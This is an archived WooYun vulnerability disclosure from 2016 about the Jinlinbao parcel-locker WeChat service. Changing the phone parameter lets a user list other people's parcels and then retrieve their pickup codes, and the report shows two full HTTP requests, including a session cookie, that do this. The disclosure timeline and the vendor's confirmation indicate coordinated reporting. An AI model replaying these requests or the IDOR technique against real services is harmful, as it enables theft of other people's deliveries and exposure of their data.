乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-31: 细节已通知厂商并且等待厂商处理中 2016-03-31: 厂商已经确认,细节仅向厂商公开 2016-04-10: 细节向核心白帽子及相关领域专家公开 2016-04-20: 细节向普通白帽子公开 2016-04-30: 细节向实习白帽子公开 2016-05-15: 细节向公众公开
近邻宝可任意领取别人快递,需知道手机号码
近邻宝可以代别人领取快递,只要知道手机号码在近邻宝微信企业号中,首先绑定手机号码,在左下角“取快递”=>“待取”处抓包
POST /weixin/ordinary/customer/get/not/receive/list/ HTTP/1.1Accept-Language: zh-CNX-Requested-With: XMLHttpRequestAccept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7Referer: http://snsbroker.jinlb.cn/weixin/ordinary/customer/my/receive/User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.1; zh-cn; 2013022 Build/HM2013022) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CNOrigin: http://snsbroker.jinlb.cnAccept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzipHost: snsbroker.jinlb.cnCookie: ltype=not_rece; session_id=9f9881c6a5384e59f25540633c34191eb807cda1Content-Length: 24phone=13521993016&page=1
修改phone参数可以查询该手机号码的未领取的快件(包含order_id,sign参数),一个order_id对应一个sign参数
利用这两个参数,发送如下请求
GET /weixin/ordinary/customer/order/detail?order_id=5574445&sign=9c79ae32889e4f8eaed09cc456191e6d<ype=rece HTTP/1.1Referer: http://snsbroker.jinlb.cn/weixin/ordinary/customer/my/receive/Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.1; zh-cn; 2013022 Build/HM2013022) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CNAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7Accept-Encoding: gzipHost: snsbroker.jinlb.cnCookie: ltype=not_rece; session_id=9f9881c6a5384e59f25540633c34191eb807cda1
有了密码就可以开箱取货了。
危害等级:高
漏洞Rank:15
确认时间:2016-03-31 19:15
感谢。
暂无